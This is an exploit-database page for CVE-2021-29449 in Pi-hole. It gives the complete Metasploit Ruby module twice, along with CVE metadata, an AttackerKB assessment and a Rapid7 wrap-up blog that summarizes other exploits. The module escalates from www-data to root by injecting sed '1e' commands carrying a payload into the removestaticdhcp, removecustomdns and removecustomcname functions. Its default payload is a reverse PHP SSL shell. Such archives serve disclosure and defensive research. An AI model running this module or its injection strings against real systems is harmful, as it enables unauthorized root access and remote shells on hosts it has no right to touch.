Pi-Hole Remove Commands Linux Privilege Escalation Exploit

2021-07-30T00:00:00

Description

Pi-Hole versions 3.0 through 5.3 allows for command line input to the removecustomcname, removecustomdns, and removestaticdhcp functions without properly validating the parameters before passing to sed. When executed as the www-data user, this allows for a privilege escalation to root since www-data is in the sudoers.d/pihole file with no password.

{"id": "1337DAY-ID-36613", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Pi-Hole Remove Commands Linux Privilege Escalation Exploit", "description": "Pi-Hole versions 3.0 through 5.3 allows for command line input to the removecustomcname, removecustomdns, and removestaticdhcp functions without properly validating the parameters before passing to sed. When executed as the www-data user, this allows for a privilege escalation to root since www-data is in the sudoers.d/pihole file with no password.", "published": "2021-07-30T00:00:00", "modified": "2021-07-30T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/36613", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2021-29449"], "immutableFields": [], "lastseen": "2022-04-11T23:56:02", "viewCount": 39, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:4EFB7983-D467-4269-B8DE-5AA419E4770D"]}, {"type": "cve", "idList": ["CVE-2021-29449"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163715"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED"]}], "rev": 4}, "score": {"value": 7.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:4EFB7983-D467-4269-B8DE-5AA419E4770D"]}, {"type": "cve", "idList": ["CVE-2021-29449"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163715"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED"]}]}, "exploitation": null, "vulnersScore": 7.0}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://0day.today/exploit/36613", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n # includes: is_root?\n include Msf::Post::Linux::Priv\n # includes writable?, upload_file, upload_and_chmodx, exploit_data\n include Msf::Post::File\n # for whoami\n include Msf::Post::Unix\n # for get_session_pid needed by whoami\n include Msf::Post::Linux::System\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pi-Hole Remove Commands Linux Priv Esc',\n 'Description' => %q{\n Pi-Hole versions 3.0 - 5.3 allows for command line input to the removecustomcname,\n removecustomdns, and removestaticdhcp functions without properly validating\n the parameters before passing to sed. When executed as the www-data user,\n this allows for a privilege escalation to root since www-data is in the\n sudoers.d/pihole file with no password.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die', # msf module\n 'Emanuele Barbeno <emanuele.barbeno[at]compass-security.com>' # original PoC, analysis\n ],\n 'Platform' => [ 'unix', 'linux' ],\n 'Arch' => [ ARCH_CMD ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_php_ssl' },\n 'Payload' =>\n {\n 'BadChars' => \"\\x27\" # '\n },\n 'Privileged' => true,\n 'References' =>\n [\n [ 'URL', 'https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj' ],\n [ 'URL', 'https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt' ],\n [ 'CVE', '2021-29449' ]\n ],\n 'DisclosureDate' => '2021-04-20',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]\n },\n 'Targets' => [\n ['DHCP', { 'min' => Rex::Version.new('3.0') }], # exploitable by default, expecially when combined with unix/http/pihole_dhcp_mac_exec\n ['DNS', { 'min' => Rex::Version.new('5.0') }],\n ['CNAME', { 'min' => Rex::Version.new('5.1') }],\n ],\n 'DefaultTarget' => 0\n )\n )\n end\n\n def sudo_pihole\n 'sudo /usr/local/bin/pihole -a'\n end\n\n def pihole_version\n version = cmd_exec('sudo /usr/local/bin/pihole -v')\n /Pi-hole version is v([^ ]+)/ =~ version\n Rex::Version.new(Regexp.last_match(1))\n end\n\n def check\n w = whoami\n print_status(\"Current user: #{w}\")\n v = pihole_version\n print_status(\"Pi-hole version: #{v}\")\n unless v.between?(target['min'], Rex::Version.new('5.3'))\n return CheckCode::Safe(\"Pi-Hole version #{v} is >= 5.3 and not vulnerable\")\n end\n unless w == 'www-data'\n return CheckCode::Safe(\"User must be www-data, currently #{w}\")\n end\n\n CheckCode::Appears(\"Pi-Hole #{v} with user #{w} is vulnerable and exploitable\")\n end\n\n def method_dhcp\n f = '/etc/dnsmasq.d/04-pihole-static-dhcp.conf'\n if !file?(f) || read_file(f).empty?\n mac = Faker::Internet.mac_address\n ip = \"10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}\"\n print_status(\"Adding static DHCP #{mac} #{ip}\")\n cmd_exec(\"#{sudo_pihole} addstaticdhcp '#{mac}' '#{ip}'\")\n end\n unless file?(f)\n print_error(\"Config file not found: #{f}\")\n return\n end\n print_good(\"#{f} found!\")\n print_status('Executing payload against removestaticdhcp command')\n cmd_exec(\"#{sudo_pihole} removestaticdhcp 'a/d ; 1e #{payload.encoded} ; /'\")\n if mac\n cmd_exec(\"#{sudo_pihole} removestaticdhcp '#{mac}'\")\n end\n end\n\n def method_dns\n f = '/etc/pihole/custom.list'\n if !file?(f) || read_file(f).empty?\n name = Faker::Internet.domain_name\n ip = \"10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}\"\n print_status(\"Adding DNS entry #{name} #{ip}\")\n cmd_exec(\"#{sudo_pihole} addcustomdns '#{ip}' '#{name}'\")\n end\n unless file?(f)\n print_error(\"Config file not found: #{f}\")\n return\n end\n print_good(\"#{f} found!\")\n print_status('Executing payload against removecustomdns command')\n cmd_exec(\"#{sudo_pihole} removecustomdns 'a/d ; 1e #{payload.encoded} ; /'\")\n if name\n cmd_exec(\"#{sudo_pihole} removecustomdns '#{ip}' '#{name}'\")\n end\n end\n\n def method_cname\n f = '/etc/dnsmasq.d/05-pihole-custom-cname.conf'\n if !file?(f) || read_file(f).empty?\n name = \"#{rand_text_alphanumeric(8..12)}.edu\"\n print_status(\"Adding CNAME entry #{name}\")\n cmd_exec(\"#{sudo_pihole} addcustomcname '#{name}' '#{name}'\")\n end\n unless file?(f)\n print_error(\"Config file not found: #{f}\")\n return\n end\n print_good(\"#{f} found!\")\n print_status('Executing payload against removecustomcname command')\n cmd_exec(\"#{sudo_pihole} removecustomcname 'a/d ; 1e #{payload.encoded} ; /'\")\n if name\n cmd_exec(\"#{sudo_pihole} removecustomcname '#{name}' '#{name}'\")\n end\n end\n\n def exploit\n if target.name == 'DHCP'\n method_dhcp\n elsif target.name == 'DNS'\n method_dns\n elsif target.name == 'CNAME'\n method_cname\n end\n end\nend\n", "category": "remote exploits", "verified": true}

{"cve": [{"lastseen": "2022-04-05T20:53:44", "description": "Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Multiple privilege escalation vulnerabilities were discovered in version 5.2.4 of Pi-hole core. See the referenced GitHub security advisory for details.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-14T22:15:00", "type": "cve", "title": "CVE-2021-29449", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29449"], "modified": "2022-04-05T18:03:00", "cpe": ["cpe:/a:pi-hole:pi-hole:5.2.4"], "id": "CVE-2021-29449", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-29449", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pi-hole:pi-hole:5.2.4:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-07-30T17:21:35", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-30T00:00:00", "type": "packetstorm", "title": "Pi-Hole Remove Commands Linux Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29449"], "modified": "2021-07-30T00:00:00", "id": "PACKETSTORM:163715", "href": "https://packetstormsecurity.com/files/163715/Pi-Hole-Remove-Commands-Linux-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \n# includes: is_root? \ninclude Msf::Post::Linux::Priv \n# includes writable?, upload_file, upload_and_chmodx, exploit_data \ninclude Msf::Post::File \n# for whoami \ninclude Msf::Post::Unix \n# for get_session_pid needed by whoami \ninclude Msf::Post::Linux::System \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Pi-Hole Remove Commands Linux Priv Esc', \n'Description' => %q{ \nPi-Hole versions 3.0 - 5.3 allows for command line input to the removecustomcname, \nremovecustomdns, and removestaticdhcp functions without properly validating \nthe parameters before passing to sed. When executed as the www-data user, \nthis allows for a privilege escalation to root since www-data is in the \nsudoers.d/pihole file with no password. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die', # msf module \n'Emanuele Barbeno <emanuele.barbeno[at]compass-security.com>' # original PoC, analysis \n], \n'Platform' => [ 'unix', 'linux' ], \n'Arch' => [ ARCH_CMD ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_php_ssl' }, \n'Payload' => \n{ \n'BadChars' => \"\\x27\" # ' \n}, \n'Privileged' => true, \n'References' => \n[ \n[ 'URL', 'https://github.com/pi-hole/pi-hole/security/advisories/GHSA-3597-244c-wrpj' ], \n[ 'URL', 'https://www.compass-security.com/fileadmin/Research/Advisories/2021-02_CSNC-2021-008_Pi-hole_Privilege_Escalation.txt' ], \n[ 'CVE', '2021-29449' ] \n], \n'DisclosureDate' => '2021-04-20', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] \n}, \n'Targets' => [ \n['DHCP', { 'min' => Rex::Version.new('3.0') }], # exploitable by default, expecially when combined with unix/http/pihole_dhcp_mac_exec \n['DNS', { 'min' => Rex::Version.new('5.0') }], \n['CNAME', { 'min' => Rex::Version.new('5.1') }], \n], \n'DefaultTarget' => 0 \n) \n) \nend \n \ndef sudo_pihole \n'sudo /usr/local/bin/pihole -a' \nend \n \ndef pihole_version \nversion = cmd_exec('sudo /usr/local/bin/pihole -v') \n/Pi-hole version is v([^ ]+)/ =~ version \nRex::Version.new(Regexp.last_match(1)) \nend \n \ndef check \nw = whoami \nprint_status(\"Current user: #{w}\") \nv = pihole_version \nprint_status(\"Pi-hole version: #{v}\") \nunless v.between?(target['min'], Rex::Version.new('5.3')) \nreturn CheckCode::Safe(\"Pi-Hole version #{v} is >= 5.3 and not vulnerable\") \nend \nunless w == 'www-data' \nreturn CheckCode::Safe(\"User must be www-data, currently #{w}\") \nend \n \nCheckCode::Appears(\"Pi-Hole #{v} with user #{w} is vulnerable and exploitable\") \nend \n \ndef method_dhcp \nf = '/etc/dnsmasq.d/04-pihole-static-dhcp.conf' \nif !file?(f) || read_file(f).empty? \nmac = Faker::Internet.mac_address \nip = \"10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}\" \nprint_status(\"Adding static DHCP #{mac} #{ip}\") \ncmd_exec(\"#{sudo_pihole} addstaticdhcp '#{mac}' '#{ip}'\") \nend \nunless file?(f) \nprint_error(\"Config file not found: #{f}\") \nreturn \nend \nprint_good(\"#{f} found!\") \nprint_status('Executing payload against removestaticdhcp command') \ncmd_exec(\"#{sudo_pihole} removestaticdhcp 'a/d ; 1e #{payload.encoded} ; /'\") \nif mac \ncmd_exec(\"#{sudo_pihole} removestaticdhcp '#{mac}'\") \nend \nend \n \ndef method_dns \nf = '/etc/pihole/custom.list' \nif !file?(f) || read_file(f).empty? \nname = Faker::Internet.domain_name \nip = \"10.199.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}\" \nprint_status(\"Adding DNS entry #{name} #{ip}\") \ncmd_exec(\"#{sudo_pihole} addcustomdns '#{ip}' '#{name}'\") \nend \nunless file?(f) \nprint_error(\"Config file not found: #{f}\") \nreturn \nend \nprint_good(\"#{f} found!\") \nprint_status('Executing payload against removecustomdns command') \ncmd_exec(\"#{sudo_pihole} removecustomdns 'a/d ; 1e #{payload.encoded} ; /'\") \nif name \ncmd_exec(\"#{sudo_pihole} removecustomdns '#{ip}' '#{name}'\") \nend \nend \n \ndef method_cname \nf = '/etc/dnsmasq.d/05-pihole-custom-cname.conf' \nif !file?(f) || read_file(f).empty? \nname = \"#{rand_text_alphanumeric(8..12)}.edu\" \nprint_status(\"Adding CNAME entry #{name}\") \ncmd_exec(\"#{sudo_pihole} addcustomcname '#{name}' '#{name}'\") \nend \nunless file?(f) \nprint_error(\"Config file not found: #{f}\") \nreturn \nend \nprint_good(\"#{f} found!\") \nprint_status('Executing payload against removecustomcname command') \ncmd_exec(\"#{sudo_pihole} removecustomcname 'a/d ; 1e #{payload.encoded} ; /'\") \nif name \ncmd_exec(\"#{sudo_pihole} removecustomcname '#{name}' '#{name}'\") \nend \nend \n \ndef exploit \nif target.name == 'DHCP' \nmethod_dhcp \nelsif target.name == 'DNS' \nmethod_dns \nelsif target.name == 'CNAME' \nmethod_cname \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163715/pihole_remove_commands_lpe.rb.txt", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-08-02T17:26:35", "description": "Pi-hole is a Linux network-level advertisement and Internet tracker blocking application. Multiple privilege escalation vulnerabilities were discovered in version 5.2.4 of Pi-hole core. See the referenced GitHub security advisory for details.\n\n \n**Recent assessments:** \n \n**h00die** at May 31, 2021 11:59am UTC reported:\n\nThere are 3 vulnerabilities associated with this CVE, all are priv esc. All three use the same simple trick to execute while being sent to `sed` from the command line. `www-data` by default is listed in the `sudoers` file to run `pihole`.\n\n`removestaticdhcp` command requires `/etc/dnsmasq.d/04-pihole-static-dhcp.conf`, and is exploitable from 3.0-5.2.4.\n\n`removecustomdns` command requires `/etc/pihole/custom.list`, and is exploitable from 5.1-5.2.4.\n\n`removecustomcname` command requires `/etc/dnsmasq.d/05-pihole-custom-cname.conf`, and is exploitable from 5.0-5.2.4.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-29449", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-29449"], "modified": "2021-04-23T00:00:00", "id": "AKB:4EFB7983-D467-4269-B8DE-5AA419E4770D", "href": "https://attackerkb.com/topics/0HUT2niFGw/cve-2021-29449", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-30T19:00:15", "description": "## New Olympic Discipline: Hive Hunting\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/07/metasploit-blg-2-small.png)\n\nThis week, community contributor [Hakyac](<https://github.com/Hakyac>) added a new Olympic discipline to Metasploit exploit sport category, which is based on the work of community security researchers [@jonasLyk](<https://twitter.com/jonasLyk/status/1417205166172950531>) and [Kevin Beaumont](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)). The rules are simple: You need to abuse a flaw in Windows 10 and 11 configuration to pass through the defense and access Security Account Manager (SAM) files. Any local unprivileged player is able to read this sensitive security information, such as hashes of user/admin passwords. The best strategy to win a gold medal is to start abusing Windows Volume Shadow Copy Service (VSS) to access these files and copy them locally. Finally, you just need to dump the NTLM hashes, use them in a pass-the-hash attack and score with a remote code execution.\n\nNote that Microsoft issued an out-of-band [advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and tracked this vulnerability as [CVE-2021-36934](<https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege?referrer=blog>). You can find more information about the rules in this blog [post](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>). Happy Hive hunting!\n\n## Gold Medal for NetGear R7000 in Swimming 100m Heap Overflow\n\nOur own [Grant Willcox](<https://github.com/gwillcox-r7>) added a new exploit module that won the Swimming 100m Heap Overflow discipline. It took advantage of a flaw in `genie.cgi?backup.cgi` page of Netgear R7000 routers to enable a telnet server and easily got code execution as the `root` user. Note that, whereas firmware versions `1.0.11.116` and prior are vulnerable, this module can only be used with versions `1.0.11.116` at the moment. The `check` method can still be used to detect if older devices are vulnerable. This module is based on research done by [@colorlight2019](<https://twitter.com/colorlight2019>). A new gold medal for the Metasploit team, great job!\n\n## New module content (5)\n\n * [Netgear R7000 backup.cgi Heap Overflow RCE](<https://github.com/rapid7/metasploit-framework/pull/15163>) by [Grant Willcox](<https://github.com/gwillcox-r7>), SSD Disclosure, and colorlight2019, which exploits [CVE-2021-31802](<https://attackerkb.com/topics/KwzVhOiykj/cve-2021-31802?referrer=blog>) \\- This adds an module that will leverage CVE-2021-31802 which is an unauthenticated RCE in Netgear R7000 routers. The vulnerability is leveraged to execute a shellcode stub that will enable telnet which can then be accessed for root privileges on the affected device.\n * [Pi-Hole Remove Commands Linux Priv Esc](<https://github.com/rapid7/metasploit-framework/pull/15279>) by [Emanuele Barbeno](<https://ch.linkedin.com/in/emanuele-barbeno-b53a4990>) and [h00die](<https://github.com/h00die>), which exploits [CVE-2021-29449](<https://attackerkb.com/topics/0HUT2niFGw/cve-2021-29449?referrer=blog>) \\- This adds a local privilege escalation module that targets Pi-Hole versions >= `3.0` and <= `5.2.4`. In vulnerable versions of the software, a user with `sudo` privileges can escalate to `root` by passing shell commands to either the `removecustomcname`, `removecustomdns`, or `removestaticdhcp` function. The functions have minimal sanitization, and they pass the input to the `sed` command. By default, the `www-data` user is permitted to run `sudo` without supplying a password as configured in the `sudoers.d/pihole` file.\n * [Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15418>) by Nguyen Van Khanh, [Ron Jost](<https://github.com/Hacker5preme>), and [Yann Castel](<https://github.com/Hakyac>), which exploits [CVE-2021-24145](<https://attackerkb.com/topics/TWCON6tk7O/cve-2021-24145?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin known as Modern Events Calendar. For versions before `5.16.5`, an administrative user can upload a php payload via the calendar import feature by setting the content type of the file to `text/csv`. Code execution with the privileges of the user running the server is achieved by sending a request for the uploaded file.\n * [Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/15408>) by [Ron Jost](<https://github.com/Hacker5preme>) and [Yann Castel](<https://github.com/Hakyac>), which exploits [CVE-2021-24347](<https://attackerkb.com/topics/gechd9yh12/cve-2021-24347?referrer=blog>) \\- This adds a module that exploits an authenticated file upload vulnerability in the Wordpress plugin, SP Project and Document Manager. For versions below `4.22`, an authenticated user can upload arbitrary PHP code because the security check only blocks the upload of files with a `.php` extension, meaning that uploading a file with a `.pHp` extension is allowed. Once uploaded, requesting the file will result in code execution as the `www-data` user.\n * [Windows SAM secrets leak - HiveNightmare](<https://github.com/rapid7/metasploit-framework/pull/15462>) by [Kevin Beaumont](<https://twitter.com/GossiTheDog>), [Yann Castel](<https://github.com/Hakyac>), and [romarroca](<https://github.com/romarroca>), which exploits [CVE-2021-36934](<https://attackerkb.com/topics/DOrZUykRSX/cve-2021-36934-windows-elevation-of-privilege?referrer=blog>) \\- This adds a new exploit module that exploits a configuration issue in Windows 10 (from version 1809) and 11, identified as CVE-2021-36934. Due to permission issues, any local user is able to read SAM and SYSTEM hives. This module abuses Windows Volume Shadow Copy Service (VSS) to access these files and save them locally.\n\n## Enhancements and features\n\n * [#15444](<https://github.com/rapid7/metasploit-framework/pull/15444>) from [pingport80](<https://github.com/pingport80>) \\- This adds additional support for Powershell sessions to some methods in the File mixin leveraged by post modules.\n * [#15465](<https://github.com/rapid7/metasploit-framework/pull/15465>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- Updates the local exploit suggester to gracefully handle modules raising unintended exceptions and nil target information\n\n## Bugs fixed\n\n * [#15359](<https://github.com/rapid7/metasploit-framework/pull/15359>) from [stephenbradshaw](<https://github.com/stephenbradshaw>) \\- Fixes a bug in the ssh_login_pubkey which would crash out when not connected to the db\n * [#15460](<https://github.com/rapid7/metasploit-framework/pull/15460>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the File libraries `copy_file` method caused by it searching for a word in the output to determine success.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.54...6.0.55](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-22T11%3A58%3A03-05%3A00..2021-07-29T12%3A01%3A27-05%3A00%22>)\n * [Full diff 6.0.54...6.0.55](<https://github.com/rapid7/metasploit-framework/compare/6.0.54...6.0.55>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-30T18:04:33", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24145", "CVE-2021-24347", "CVE-2021-29449", "CVE-2021-31802", "CVE-2021-36934"], "modified": "2021-07-30T18:04:33", "id": "RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED", "href": "https://blog.rapid7.com/2021/07/30/metasploit-wrap-up-123/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}]}

Pi-Hole Remove Commands Linux Privilege Escalation Exploit

Description

Related